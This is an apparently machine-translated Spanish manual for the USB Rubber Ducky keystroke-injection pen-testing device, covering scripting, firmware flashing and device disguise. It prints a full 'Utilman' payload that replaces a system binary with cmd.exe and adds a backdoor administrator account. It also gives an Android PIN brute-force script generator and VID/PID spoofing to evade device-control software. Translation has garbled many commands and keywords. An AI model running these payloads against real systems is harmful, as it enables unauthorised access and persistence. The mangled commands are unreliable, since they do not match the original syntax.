2

Descargar como docx, pdf o txt
Descargar como docx, pdf o txt
Está en la página 1de 22

Habla de contenido

Descargo de responsabilidad 4
Caractersticas de un vistazo 4 en
Historia 4
Conozca su Ducky 5
Hardware 5
Ducky Guin general 5
Mdulos / Firmware adicional 5
La historia de Bob 6
Conexin por primera vez 7
Generando tu primer Ducky Guin 7
Utilizando Encoder Versin 1 7
Su primer guin 7
Utilizando Encoder Versin 2.1 + 8
Su primer guin 8
Cdigo de ejemplo Ducky 9
Ventanas Wallpaper Prank 9
Ventanas Utilman Exploit 10
Ducky In Disguise 12
Caso USB 12
De poner el caso en conjunto 12
Extraccin del Caso 12
Pato de la novedad 12
Ducky y Android 13
Linux - Bash script 14
OSX - Shell Script 14
Mejoras 14
Soporte 15
Crditos 16
Gracias 16
Apndice: Especificacin 17
Atmel AT32UC3B1256 Caractersticas 17
Apndice: Gua Intermitente - Windows 18
Instalacin 18
Atmel Conductor 18
Intermitente 21
Apndice: Intermitente Gua - Linux / OSX 22
Introduccin 22
La compilacin de 22
La actualizacin del firmware 22
Dump (copia de seguridad) de firmware actual 22
Actualizacin 22
Apndice: Definiciones de firmware 23
Apndice: Trucos 25
Cambie el VID y el PID de la Ducky Firmware v1 25
Busque el VID y PID 25
Tabla Hex 25

Cambie el VID y PID 26


Cambie el VID y el PID de la Ducky firmware v2 26
Linux: 26
Ventanas: 26
Apndice: Ducky Guin API 27
REM 27
DEFAULT_DELAY o DEFAULTDELAY 27
RETRASO 27
CADENA 27
WINDOWS o GUI 28
MENU o APP 28
SHIFT 28
ALT 28
CONTROL o CTRL 28
Teclas de flecha 29
Extended Comandos 29
Apndice: Creacin de Soporte de idiomas en V2.1 Encoder Pato + 30
Language Pack Lugar 30
Cmo paquetes de idioma de trabajo? 30
Crear Nuevo Soporte de idiomas (1) 30
As que, cmo saber = ISO_8859_1_A7? 30
Crear Nuevo Soporte de idiomas (2) 30
Cmo descubres cdigos HID? 30
Software de Windows 30
Software Linux 31
Preguntas ms frecuentes (FAQ) 32
1. Insert mi Ducky en una computadora con Windows y no pasa nada? 32
2. Mi Ducky parpadea Rojo, y ahora qu? 32
3. Cuando me conecto a la Ducky, hace algo raro, y ejecuta todo en mi
escritorio? 32
4. Soy de X pas, el Ducky dispara llaves aparentemente al azar, qu est
pasando? 32
5. Soy de X pas. Mi idioma no est soportado el Ducky no tiene sentido. 33
6. Qu idiomas son compatibles actualmente? 33
7. DE ACUERDO. Cmo realizar la DuckEncoder.jar utilizando un mapa de
teclado especfico? 33
8. Qu sistemas de ficheros son compatibles? 33
9. Creo que mi Ducky es muerto? 33

Renuncia
El Ducky (USB Rubber Ducky) es una herramienta de pruebas de penetracin
USB para su uso en las auditoras de seguridad autorizados cuando lo permita.
Revise las leyes y obtener permiso antes de usar. Hak5, LLC y sus afiliadas
afirman ninguna responsabilidad por el uso no autorizado o daos. Por favor
hackear responsablemente.
Caractersticas de un vistazo
Sencillo lenguaje de scripts
Plataforma Cruz
-Tipo HID de ataque ms rpido que un humano
Software de control de dispositivos de derivacin
fuerza bruta Iniciar sesin Interfaces
Figura 1: El Rubber Ducky USB
Historia
Tras el xito de la Switchblade USB, la plataforma de ataque que era super
efectivo contra objetivos locales de Windows, la comunidad Hak5 ha desarrollado
un nuevo tipo de ataque - esta plataforma cruzada tiempo (Windows, Mac, Linux) que logra resultados mortales hacindose pasar por un teclado ubicua.
El Rubber Ducky USB no es su HID ordinario (Human Interface Device). Junto con
un potente procesador de 60 MHz de 32 bits y un simple lenguaje de scripting que
nadie es capaz de elaborar cargas tiles capaces de cambiar la configuracin del
sistema, la apertura de las puertas traseras, recuperacin de datos, iniciando
conchas inversa, o bsicamente cualquier cosa que se puede lograr con el acceso
fsico - todo automatizado y ejecutado en cuestin de segundos.
Multiplataforma: Ataques cualquier sistema operativo que soporta teclados USB.
Lenguaje de scripting simple: Comience a escribir cargas tiles en minutos.
Open Firmware Fuente: Agregar funcionalidad utilizando libreras incluidas.
Almacenamiento ampliable: tarjetas Micro SD hacen posible llevar a mltiples
cargas.
Apoyo a la Comunidad: Acciones scripts de ejemplo, cargas tiles completos y
obtener ayuda en lnea.
Conozca su Ducky
Hardware
AVR 32bit Micro-Controller
o AT32UC3B1256
o 256Kbytes almacenamiento interno de Flash
o de alta velocidad USB 2.0 BUS
Lector de tarjetas Micro SD
Push Button Micro
El indicador LED multicolor
Conector USB estndar "Tipo A"
Especificacin completa se puede encontrar en el Apndice:

Especificaciones.
Ducky Guin general
Ducky Script es el lenguaje del USB Rubber Ducky. Escribir guiones para que se
puede hacer desde cualquier editor de texto ASCII comn, como el Bloc de notas,
vi, emacs, nano, gedit, kedit, TextEdit, etc.
Sintaxis Ducky Script es simple. Cada comando reside en una nueva lnea y
puede tener opciones de seguir. Los comandos se escriben en maysculas,
porque los patos son fuertes y les gusta graznar con orgullo. La mayora de los
comandos invocan las pulsaciones de teclado, clave combos o cadenas de texto,
mientras que algunos retrasos oferta o pausas.
A diferencia de la Teensy, donde el conocimiento de conocimientos de
programacin basado en C y basado en Arduino es una necesidad. Ducky Guin
pretende ser un lenguaje de alto nivel que cualquier persona de cualquier nivel de
habilidad o edad puede aprender rpidamente.
Mdulos / Firmware adicional
La comunidad ha ayudado a construir una funcionalidad adicional Ducky mediante
la publicacin de firmware:
Soporte Multi Sistema Operativo
Almacenamiento masivo
Mltiple de carga til de entrega
Dispositivo compuesto (Almacenamiento y HID Misa Emulacin Teclado)
Ms detalles sobre el firmware retrospectiva, su uso y limitaciones se pueden
encontrar en el Apndice: Definiciones de firmware.
La historia de Bob
Bob es un Penetration Tester Profesional de la especialidad de la empresa X. Bob
est compromisos de ingeniera social. Compaa ACME-Financiera, ha
contratado a la empresa X (Bobs empleador) para realizar algunas pruebas de
intrusin anual para asegurar que todos sus clientes informacin financiera es
segura, y no puede ser hackeado por una tercera parte (espionaje industrial). La
evaluacin implica probar la infraestructura y la aplicacin estndar, pero ACMEfinanciera son, adems, preocupado por la ingeniera social (SE); podra alguien
simplemente entrar en el edificio y empezar a atacarlos desde su propio sistema.

Bob, al ser un ingeniero social experimentado tena las siguientes opciones


iniciales:
Camine por la puerta delantera SE la recepcionista, sentarse en un escritorio
vaco y empezar a cortar.
portn trasero un empleado de regresar al trabajo despus de un descanso de
humo, sentarse en un escritorio vaco y empezar a cortar.
Cada de una unidad USB (navaja) en el aparcamiento / comunal de la zona / los
fumadores-zona, espero que alguien se da cuenta de la unidad, lo recoge y lo
inserta en la mquina en su escritorio. El USB se inicia un revs-shell para un
servidor controla Bob, Bob puede comenzar hacking.
Bob habl con sus compaeros de equipo acerca de la infraestructura interna de
ACME-financiera, y las polticas de seguridad en el lugar. Bob se entera de que:
Barreras contra el portn trasero estn en uso.
Para iniciar sesin en una estacin de trabajo necesita una tarjeta inteligente
vlida (autenticacin de dos factores).
Las estaciones de trabajo estn bloqueados, slo para arrancar Windows XP.
Las estaciones de trabajo estn completamente parcheado.
Las estaciones de trabajo tienen antivirus instalado y las actualizaciones
recientes se han aplicado.
Planes de Bob parecen estar frustrado.
Bob record que recientemente haba visto una Rubber Ducky USB demo en
ToorCon; un pequeo dispositivo USB que podra emular un teclado. Bob
comenz a pensar en la confianza inherente entre un ordenador y sus perifricos.
Bob nunca haba llegado a travs de un equipo que se neg a utilizar un teclado
recin insertar.
As que Bob orden un USB Ducky de goma y un caso, y comenz a experimentar
con emulacin HID, y Scripts Ducky.
Bob hizo una carga inversa-shell, y se inserta el Ducky en su caso, el Ducky ahora
se pareca a una unidad USB llanura; que tras la insercin comenzara
rpidamente a escribir en el teclado y crear efectivamente una reversa-shell al
servidor de Bob en el Internet. Bob pegado una pegatina en el USB con la etiqueta
"2012 Top Informacin de la cuenta" y lo dej caer en el rea de los fumadores,
esperando que alguien descubrirlo, recogerlo, y tratar de leer la unidad USB en su
mquina.
Bob esper pacientemente en su coche, usando su mdem 4G para acceder a
Internet. Bob se sent en silencio, esperando a que el ping de un revs con
cscara. Entonces auge, Bob tena acceso a la red local! Alguien haba insertado
Ducky de Bob en su ordenador.

Conexin por primera vez


El Ducky est precargado con la fbrica por defecto emulacin HID firmware. Al
insertar el Ducky en un sistema operativo Windows, el Ducky debe abrir un cuadro
de ejecucin, y llevar al usuario a http://www.hak5.org/.
Generando tu primer Ducky Guin
Utilizando Encoder Versin 1
Encoder versin 1 se incluye en la tarjeta SD suministrada. Sin embargo, se limita
a la asignacin de teclado de Estados Unidos. Si usted es de cualquier otro pas,
no se preocupe! Hay una versin 2.1+ que soporta varios idiomas ms, y
posiblemente ms con su ayuda! Si usted es de fuera de los EE.UU., dirjase por
favor a Utilizando V2.1 + Encoder.
Su primer guin
Abre el bloc de notas (o cualquier otro editor) y probar el ejemplo simple
continuacin como su primer guin:
REM Aadir demora para garantizar de Windows puede agregar controlador
apropiado
GUI-R
Notepad CADENA
ENTRAR
RETRASO 500
CADENA Esta es mi primera Ducky Guin
ENTRAR
Guarde el archivo como example_1.txt
Ahora retire la tarjeta SD de la Ducky. Puede ser un poco dura al principio, as no
se preocupe si parece estar atascado.
Utilice un adaptador de tarjeta SD (enlace a la tienda Hak5), o utilizar cualquier
otro adaptador (tarjeta de la cmara), o incluso un puerto nativo en su PC /
ordenador porttil.
Ahora desde un shell / rpido, moverse en el mismo directorio que duckencoder.jar
(Por lo general E: /)
La sintaxis para v1 duckencoder es:
java -jar duckencoder -i <archivo de entrada> -o <archivo de salida>
Ejemplo:
e cd: /
java -jar duckencoder.jar -i example_1.txt -o inject.bin
Ahora expulsar la tarjeta SD, y la inserta en el Ducky. Asegrese de que la tarjeta
SD est al ras con el extremo de la junta directiva de la Ducky.
Inserte el Ducky en su sistema operativo Windows. Usted debe ver la libreta
abierta Ducky y escriba nuestro sencillo mensaje.

Utilizando Encoder Versin 2.1 +


Descargar: http://code.google.com/p/ducky-decode/
Despus de descubrir la debilidad de la primera versin pblica de la Ducky,
pronto se vio que el Ducky no trabajar para otros pases / idiomas. Se descubri
que algunas lenguas se movan alrededor de teclas (por ejemplo, Ingls QWERTY, Alemn - QWERTZ), y otras lenguas aadi teclas adicionales (por
ejemplo, el teclado del Reino Unido tiene \, , etc.). Crdito inicial que aqu va a
Midnitesnake para la Prueba de concepto inicial (PoC) probando el soporte de
idiomas se encuentran dentro del codificador y no el firmware. Recientes crdito
va a Dnucna para mejorar PoC de Midnitesnake y produciendo el Encoder Pato
V2.1 +, que utiliza un archivo de propiedades para definir lo que las pulsaciones
de teclado generar un carcter particular (dentro de un formato ASCII dado, ISO,
UTF, etc.).
Su primer guin
Abre el bloc de notas (o cualquier otro editor) y probar el ejemplo simple
continuacin como su primer guin:
REM Aadir demora para garantizar de Windows puede agregar controlador
apropiado
RETRASO 5000
GUI-R
Notepad CADENA
ENTRAR
RETRASO 500
CADENA Esta es mi primera Ducky Guin
ENTRAR
Guarde el archivo como example_1.txt
Ahora retire la tarjeta SD de la Ducky. Puede ser un poco dura al principio, as no
se preocupe si parece estar atascado.
Utilice un adaptador de tarjeta SD (enlace a la tienda Hak5), o utilizar cualquier
otro adaptador (tarjeta de la cmara), o incluso un puerto nativo en su PC /
ordenador porttil.
Ahora desde un shell / rpido, moverse en el mismo directorio que duckencoder.jar
(Por lo general E: /).
La sintaxis para duckencoder v2.1 + es:
java -jar duckencoder -l <country_code / path a properties_file> -I <input> -o
<output>
Ejemplo (Windows):
e cd: /
java -jar duckencoder.jar recursos -l \ uk.properties -i example_1.txt -o inject.bin
Ahora expulsar la tarjeta SD, y la inserta en el Ducky. Asegrese de que la tarjeta
SD est al ras con el extremo de la junta directiva de la Ducky.

Inserte el Ducky en su sistema operativo Windows. Usted debe ver la libreta


abierta Ducky y escriba nuestro sencillo mensaje.
Cdigo de ejemplo Ducky
Una coleccin de cargas tiles se puede encontrar aqu:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Ventanas Wallpaper Prank
Autor: Darren Cocina
Duckencoder: 1.0
Objetivo: Windows 7
Descripcin: Minimiza todas las ventanas al escritorio, toma la captura de
pantalla, desactiva los iconos del escritorio, salva pantalla en% userprofile% y
establece como fondo de pantalla
RETRASO 5000
GUI d
RETRASO 500
PRINTSCREEN
RETRASO 100
MEN
RETRASO 300
CADENA V
RETRASO 40
CADENA D
RETRASO 300
GUI r
RETRASO 700
Mspaint CADENA
ENTRAR
RETRASO 1200
CTRL v
RETRASO 500
CTRL s
RETRASO 1000
CADENA% USERPROFILE% \ .bmp
ENTRAR
RETRASO 500
ALT f
RETRASO 400
CADENA K
RETRASO 100
CADENA F
RETRASO 1000
ALT F4
RETRASO 300
GUI d

Ventanas Utilman Exploit


Autor: Xcellerator (! Apoyos a Tenedor guin Bomba de Jay Kruer para la tcnica
de bypass UAC)
Duckencoder: 1.0
Objetivo: Windows 7
Descripcin: Usa el Utilman.exe Exploit para crear una nueva cuenta de
administrador local "Local000" con el "Hak5" contrasea.
REM Autor: Xcellerator
REM Descripcin: Utilman Explotador para crear una nueva cuenta de
administrador
REM La nueva cuenta se llama "Local000".
RETRASO 5000
GUI
RETRASO 50
Cmd STRING
MEN
CADENA un
ENTRAR
IZQUIERDA
ENTRAR
RETRASO 200
CADENA takeown / f "% systemroot% \ System32 \ Utilman.exe"
ENTRAR
RETRASO 50
CADENA Icacls "% systemroot% \ System32 \ Utilman.exe" administradores
/ subvencin: F / T
ENTRAR
RETRASO 50
CADENA cd% systemroot% \ System32
ENTRAR
RETRASO 50
Util mkdir CADENA
ENTRAR
CADENA xcopy cmd.exe util \
ENTRAR
RETRASO 50
Ren STRING Utilman.exe Utilman.exe.bak
ENTRAR
Util STRING cd
ENTRAR
RETRASO 50
Ren STRING cmd.exe Utilman.exe
ENTRAR
RETRASO 50
Cd STRING ..

ENTRAR
RETRASO 50
CADENA xcopy util / Utilman.exe \
ENTRAR
RETRASO 50
Rmdir CADENA / s / q util
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
RETRASO 50
GUI u
CADENA net user Local000 / add
ENTRAR
RETRASO 50
Administradores STRING localgroup neta Local000 / add
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
RETRASO 50
GUI r
Cmd STRING
ENTRAR
RETRASO 50
CADENA cd "% systemroot% \ System32"
ENTRAR
RETRASO 50
CADENA eliminar Utilman.exe
ENTRAR
RETRASO 50
STRING y
ENTRAR
RETRASO 50
Ren STRING Utilman.exe.bak Utilman.exe
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
GUI
Cmd STRING
MEN
CADENA un
ENTRAR
RETRASO 50
IZQUIERDA

ENTRAR
RETRASO 200
CADENA Local000 net user *
ENTRAR
Hak5 CADENA
ENTRAR
Hak5 CADENA
ENTRAR
Salida CADENA
ENTRAR
Ducky In Disguise
Caso USB
Para hacer el patito ms eficaz y duradera durante los compromisos, la Ducky
ahora viene con un estuche USB. La carcasa est moldeada especficamente a la
junta directiva de la Ducky por un agradable, en forma convincente ceido.
Figura 2: El Caso Ducky
Figura 3: Novelty Rubber Ducky
De poner el caso en conjunto
El Ducky deber insertarse fcilmente en la base, entonces usted puede
fcilmente en la cubierta superior y la cubierta metlica opcional; por lo que se ve
como un dispositivo USB normales / promocional. Ver Figura 2: El Caso Ducky.
Extraccin del Caso
El caso negro tiene un pequeo agujero en la parte posterior (opuesto de la Una
interfaz USB). Simplemente inserte un alfiler o clip para separar las dos partes
moldeadas negras, para recuperar el desnudo Ducky.
Pato de la novedad
Usted tambin debera haber recibido un pato de goma novedad (uno de muchos
colores surtidos). Para hacer su Ducky parezca un dispositivo USB de la novedad.
Su "novedad" Ducky necesita un poco de ciruga.
Advertencia: Cuchillos estn afilados, cuidado!
Simplemente corte una pequea incisin lateral en el trasero de la Ducky, luego
apriete el culo de la Ducky y suavemente inserte el (Tarjeta electrnica) Ducky. A
continuacin, debe tener algo parecido a la Figura 3: Novelty Ducky de goma.
Ducky y Android
Darren descubri que un Ducky se podra utilizar para un ataque de fuerza bruta
Pin Android. Hasta el momento ha funcionado a la perfeccin en un Galaxy
Nexus / Nota ejecutando la ltima Android 4.2.1.
Figura 4: Son Droids miedo de Patos elctricos?

Para este ataque funcione se necesita un USB (micro) On-The-Go cable (OTG)
como el que se muestra a continuacin:
Figura 5: Un cable USB OTG
Con un PIN de 4 dgitos y el valor por defecto de 5 intentos, seguido de un
segundo tiempo de espera de 30 usted est buscando en el mejor de los caso de
agotar el espacio clave en alrededor de 16,6 horas. Afortunadamente el USB
Rubber Ducky nunca se cansa, aburrido o tiene que hacer pis.
En lugar de publicar los casi 600K Ducky Guin continuacin es el script bash
utilizado para crearlo. Usted podra modificarlo para hacer 5 dgitos, pero que
tomara 166 horas. 10 dgitos tomaran 1902,2 aos.
Linux - Bash script
eco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} |
xargs -n 1 echo STRING | sed '0 ~ 5 s / $ / \ nWAIT / g' | sed '0 ~ 1 s / $ / \ nDELAY
1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_0000-9999.txt sed '/
ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY
5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'
OSX - Shell Script
eco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} |
xargs -n 1 echo STRING | GSED '0 ~ 5 s / $ / \ nWAIT / g' | GSED '0 ~ 1 s / $ / \
nDELAY 1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_00009999.txt GSED '/ ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \
NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'
Mejoras
Es posible que desee modificar el script Ducky para tratar los 10 pernos de
telfono ms comunes, antes de que los intentos de fuerza bruta:
1234
1111
0000
1212
7777
1004
2000
4444
2222
6969

Apoyo
Las actualizaciones de software, segmentos relacionados de la feria Hak5,
artculos de blog Hak5 y los foros USB Rubber Ducky estn vinculados desde el
sitio usbrubberducky.com. Las preocupaciones sobre los pedidos pueden dirigirse
a [email protected].
Figura 6: USB Foro Rubber Ducky

Al publicar preguntas al foro USB Ducky de goma, por favor indique:


Ducky versin de hardware
Nombre Ducky Firmware Version / Cdigo
Su Pas / Idioma
Su sistema operativo
Su sistema operativo de destino
Su Ducky Guin
Cualquier mensaje de error o de archivo de registro de informacin
Crditos
El Rubber Ducky USB es trado a usted por el Quack-Team:
Darren Cocina
Jason Applebaum
Midnitesnake
Dnucna
ApacheTechConsultancy
Una increble comunidad - usbrubberducky.com
http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
Software de cdigo abierto se distribuye bajo la Licencia Pblica General GNU
http://www.gnu.org/licenses/gpl.html
El firmware es bajo licencia de ATMEL
http://www.atmel.com/about/legal.asp
Gracias
Para todos los que ayudaron con cargas tiles, y ayud a desarrollar nuevos
mapas de teclas.
Apndice: Especificacin
Caractersticas Atmel AT32UC3B1256
Alto rendimiento, energa baja AVR 32 UC Microcontrolador 32-Bit
Compacto de ciclo nico del conjunto de instrucciones RISC Incluyendo DSP
Instruction Set
Instrucciones de lectura-modificacin-escritura y manipulacin de bits Atmica
Realizacin de hasta 1,39 DMIPS / MHz
Hasta 83 DMIPS Correr a 60 MHz desde Flash
Hasta 46 DMIPS funcionamiento a 30 MHz desde Flash
Unidad de Proteccin de la memoria
Bus de sistema Multi-jerarqua
High-Performance transferencias de datos en buses separados para un mayor
rendimiento
7 canales perifricos DMA Mejora la velocidad para Perifrica de Comunicacin
Alta velocidad interna flash
512K Bytes, 256K Bytes, 128 Kb, 64 KB Versiones
Ciclo individual Acceso hasta 30 MHz

Prefetch Buffer Optimizacin de ejecucin de instrucciones a la mxima


velocidad
Pgina 4 ms Tiempo de Programacin y 8ms completo-Chip Erase Tiempo
100.000 ciclos de escritura, de 15 aos la capacidad de retencin de datos
Cerraduras de Seguridad Flash y definido por el usuario rea de configuracin
Alta velocidad interna SRAM, Acceso solo para bicicletas en el Full Speed
Bytes 96K (512 KB Flash), 32K Bytes (256 KB y 128 KB Flash), 16K Bytes (64KB
Flash)
Controlador de interrupcin
Autovectored Latencia del servicio de interrupcin Low con prioridad programable
Funciones del sistema
Energa y Gerente Reloj Incluyendo RC interno Reloj y Uno 32KHz Oscilador
Dos Osciladores de usos mltiples y dos Fase-Lock-Loop (PLL) permitiendo
independiente frecuencia de la CPU desde USB Frecuencia
Temporizador de vigilancia, en tiempo real de reloj temporizador
Universal Serial Bus (USB)
Dispositivo 2.0 y Host Embedded de baja velocidad y de velocidad completa
End-Point Configuracin flexible y Gestin con Dedicados Canales DMA
Transceptores On-chip Incluyendo Pull-Ups
Wake USB del sueo Funcionalidad
One Three-Channel temporizador de 16 bits / Contador (TC)
Tres Reloj externo Entradas, PWM, Captura y Varios Contar Capacidades
Uno de 7 canales de 20 bits de ancho de pulso modulacin Controller (PWM)
Tres universal sncrono / asncrono receptor / Transmisores (USART)
Velocidad de transmisin independiente Generador, Apoyo a SPI, IrDA y las
interfaces de ISO7816
Soporte para hardware apretn de manos, RS485 Interfaces y Modem Line
Un maestro / esclavo serie Interfaces perifricos (SPI) con Chip Select Seales
Una sncrono del Protocolo serie
Soporta I2S y protocolos basados en fotogramas en genricos
compatible I2C-400kbit / s Un maestro / esclavo de dos hilos Interface (TWI)
Uno de 8 canales de 10 bits de analgico a digital, 384ks / s
16 bits de audio estreo Bitstream DAC
Frecuencia de muestreo de hasta 50 kHz
Apoyo QTouch Biblioteca
capacitiva Touch botones, deslizadores y Ruedas
QTouch y qMatriz Adquisicin
Apndice: Gua Intermitente - Windows
Cuando se trata de la programacin del pato que necesita esos recursos para
Windows: http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck
%20Programming.zip.
Adems es posible que tenga JRE FLIP de http://www.atmel.com/tools/FLIP.aspx y
asegrese de utilizar los controladores en el Programming.zip
Microsoft Visual C ++ Redistributable:
86 - http://www.microsoft.com/en-gb/download/deails.aspx?id=5555
x64 - http://www.microsoft.com/en-gb/download/details.aspx?id=14632

Instalacin
Esto es muy fcil y se puede completar en 2-3 pasos:
1. Instale Visual C ++ Redistributable
2. Instale tirn
3. Instale Atmel Conductor
4. Actualice el dispositivo Atmel DFU en el Administrador de dispositivos
Atmel Conductor
Inserte el Ducky en modo DFU (manteniendo pulsado el botn del Ducky abajo de
forma continua, mientras que la insercin de la Ducky en el PC)
Si Windows no se instala automticamente el controlador correcto, no se preocupe
un manual de instalacin resolver el problema.
Abra el Administrador de dispositivos:
Windows XP: Haga clic derecho en Mi PC -> Propiedades - Perfiles> Hardware ->
Administrador de dispositivos
Windows Vista +: Haga clic derecho en Mi PC -> Propiedades -> Administrador de
dispositivos
El dispositivo Atmel se puede encontrar bajo otros dispositivos, y debe tener un
pequeo icono de advertencia amarillo - acusar problemas con los controladores.
Tenemos que actualizar el controlador, logrado siguiendo los siguientes pasos:
Figura 7: Administrador de dispositivos - Encuentra el dispositivo USB Atmel
Haga clic en el icono "AT32UC3B DFU" y seleccione "Actualizar controlador"
Figura 8: Actualice el controlador Atmel
Manualmente Buscar / Especifique el conductor Lugar
Figura 9: Instalacin manual de Atmel Conductor
Instale el controlador de Windows Lib-USB:
Figura 10: Instalacin de Lib-USB Driver
Instalacin del controlador completo:
Figura 11: Instalacin del controlador Atmel completa
Intermitente
Primero inserte el patito manteniendo continuamente presionado el pequeo botn
negro.
Esto pone el patito en modo DFU; tenemos que estar en este modo de actualizar
el firmware.
Es bastante sencillo, basta con ejecutar:
program.bat new_firmware.hex
Apndice: Intermitente Gua - Linux / OSX
Introduccin
En el agarre lateral Unix / OSX estos scripts de shell agradable para el vertimiento
existente y programar el nuevo firmware. Disponible aqu: DFU-programador-0.5.4

Nota: Hay problemas reportados con versin DFU-programador 0.5.2, por favor
intente la versin ms reciente en el enlace que aparece arriba.
Compilacin
Extraiga el paquete, configurar, hacer e instalar:
tar -xzf DFU-programador-0.5.4.tgz
cd DFU-programador-0.5.4
./configure
hacer
sudo make install
La actualizacin del firmware
Dump (copia de seguridad) de firmware actual
sudo DFU-programador volcado at32uc3b1256> dump.bin
No se olvide de restablecer el Ducky:
sudo reinicio at32uc3b1256 DFU-programador
Actualizacin
Paso 1 - borrar el patito:
sudo DFU-programador at32uc3b1256 borrado
Paso 2 - actualizar el firmware:
sudo DFU-programador at32uc3b1256 parpadea --suppress-bootloader-mempatito update.hex
Paso 3 - No se olvide de restablecer el Ducky:
sudo reinicio at32uc3b1256 DFU-programador
Apndice: Definiciones de firmware
Pato
Duck.hex el firmware de pato original, mejorado para trabajar en todo del sistema
operativo (Win, Unix, OSX, Android, +).
Grasa de pato
USB.hex convierte el Ducky en un dispositivo USB de almacenamiento masivo.
Originalmente burlado, como intil; algunas personas pierden el potencial /
propsito de este proyecto. Originalmente desarrollado para eludir el software de
control de dispositivo que los cdigos de la lista de negro / lista blanca de
dispositivos USB con sede fuera de VID y PID. A medida que el Ducky es
programable, por lo-largo como VID vlida se utiliz / clase de dispositivo PID, la
Ducky podra eludir el software de control del dispositivo.
Este fue lanzado pblicamente cuando el apoyo Ducky pareca disminuir. Los
pensamientos eran al menos la gente podra convertir su pato en una unidad USB
til, en lugar de tener un proyecto fallido atrapado en un cajn (La gente se haba
bifurcado originalmente fuera de $ 80 (USD) para uno de estos muchachos poco).
Otros llaman Ducky propietarios Quackers.
Pato Detour (anteriormente conocido como el "Pato Naked")
El firmware m_duck.hex apoya-mltiples cargas tiles:
inject.bin - carga por defecto (siempre que se ejecute)
inject2.bin - NUM_LOCK
inject3.bin - Bloq Mays
inject4.bin - bloqueo de desplazamiento

Bsicamente, inject.bin siempre se dispara en la insercin Ducky.


inject2 / 3 / 4.bin se activan, garantizando slo Num_Lock / Bloq Mays / LED
Teclado Scroll_Lock 's est encendido
Esto proyecta Firmware fue apodado originalmente The Duck Desnudo / Naked
Ducky Edition como Ducky tena que estar desnudo para que empuje el botn y
disparar la segunda / tercera / cuarta carga til; los ltimos avances en la versin 2
del firmware deben dar lugar directamente desde el teclado.
Propsito planteado
Uno Ducky; apoyar 3x sistemas operativos o por etapas cargas tiles:
inject.bin - archivo predeterminado (simple 1-liner "RETRASO 5000")
inject2.bin - Windows XP Guin / Carga 2
inject3.bin - Windows Vista + Guin / carga til 3
inject4.bin - OSX Guin / Carga til 4
Soporte Multi OS
As que en Windows Host, asegrese Num_Lock est encendido, y empuje el
botn de la Ducky para entregar una carga til basado en Windows.
En OSX, asegrese de Bloq Mays est encendido, y empuje el botn de la Ducky
para entregar una carga til basado en OSX.
Multi carga til Soporte
Por inject.bin predeterminada siempre se activa tras la insercin de la Ducky.
Es posible que dependiendo del software instalado (por ejemplo, PowerShell)
quieren desencadenar una de las dos cargas tiles diferentes.
Windows 7 + - Uso Num_Lock para inject2.bin para utilizar PowerShell
Windows XP - Utilizacin Bloq Mays para inject3.bin para utilizar otros binarios
de Windows (por ejemplo, TFTP para descargar cargas tiles)
Doble Duck
c_duck_v2.hex - Duck Composite, en varios idiomas.
Este fue otro importante objetivo del proyecto. Creado un trabajo de prueba de
concepto justo a tiempo para el aniversario de 1 ao! Inyeccin de HID y de
almacenamiento masivo apoyan todo dentro de un dispositivo.
Apodado El Pato gemelo ya que funciona como dos separados Ducky de.
Apndice: Trucos
Cambie el VID y el PID de la v1 Ducky Firmware
En lugar de volver a compilar el firmware para cambiar el VID y el PID de la Ducky.
Slo tiene que utilizar un editor hexadecimal / o un simple comando sed - para
cambiar el VID y PID!
Y simplemente re-flashear el firmware.
Advertencia: Es necesario tener el VID y PID dentro de la misma clase de
dispositivo. Por ejemplo, para el modo de teclado HID, impulsin del USB, para el
modo de almacenamiento.
Si le das a la Ducky un VID y PID completamente diferente (o aleatorio), como una
cmara / digital webcam - el sistema operativo se carga el controlador errneo y el
Ducky no funcionar!
Busque el VID y PID
El VID y PID predeterminado es 03EB (VID) 2403 (PID)
Debido a la Endian-ess del archivo hexadecimal tenemos que buscar EB030324

reverse (03EB) + marcha atrs (2403) = (EB03) (0324) = EB030324


hexdump -C usb.hex | grep "EB030324"
00010700 34 30 45 42 30 33 30 33 32 34 36 38 0d 0a 3a 31 | 40EB03032468 ..: 1
|
Hex Tabla
Para entender la relacin entre hexadecimal y decimal, por favor consulte la tabla
en el siguiente enlace:
Figura 12: Tabla ASCII
Cambie el VID y PID
Ahora en Linux, podemos cambiar fcilmente el PID para 2503. (o 0325 despus
de ser convertido a hex = \ x30 \ x33 \ x32 \ x35 a travs de sed
El siguiente comando se usa para cambiar el VID y PID, usb.hex se deja en su
(copia de seguridad) usb1.hex estado predeterminado contendr nuestro nuevo
firmware con el VID / PID cambi:
sed 's / \ x45 \ x42 \ x30 \ x33 \ x30 \ x33 \ x32 \ x34 / \ x45 \ x42 \ x30 \ x33 \ x30 \
x33 \ x32 \ x35 / g' <usb.hex> usb1.hex
Ahora para comprobar usb1.hex, por el VID / PID (03EB 2503):
hexdump -C usb1.hex | grep "EB030325"
00010700 34 30 45 42 30 33 30 33 32 35 36 38 0d 0a 3a 31 | 40EB03032568 ..: 1
|
Cambie el VID y el PID de la v2 Ducky Firmware
En lugar de extraer, modificar el VID y PID con un editor hexadecimal y la molestia
de volver a parpadear el pato. La versin 2 de todo el firmware tiene un truco muy
til. Leer el VID y el PID de un archivo binario.
Slo tiene que utilizar un editor hexadecimal para crear un archivo llamado
vidpid.bin en la raz de la sdcard.
Los primeros 2bytes representan la VID.
La segunda 2bytes representan el PID.
Linux:
$ Hexedit /media/DUCKY/vidpid.bin
...
00000000 03 EB 03 25 ...%
00000014
Advertencia: El VID y PID tiene que coincidir con la clase del dispositivo, por
ejemplo un firmware compuesto no funcionar con el VID y el PID de un teclado,
necesita un dispositivo compuesto a juego VID y PID.
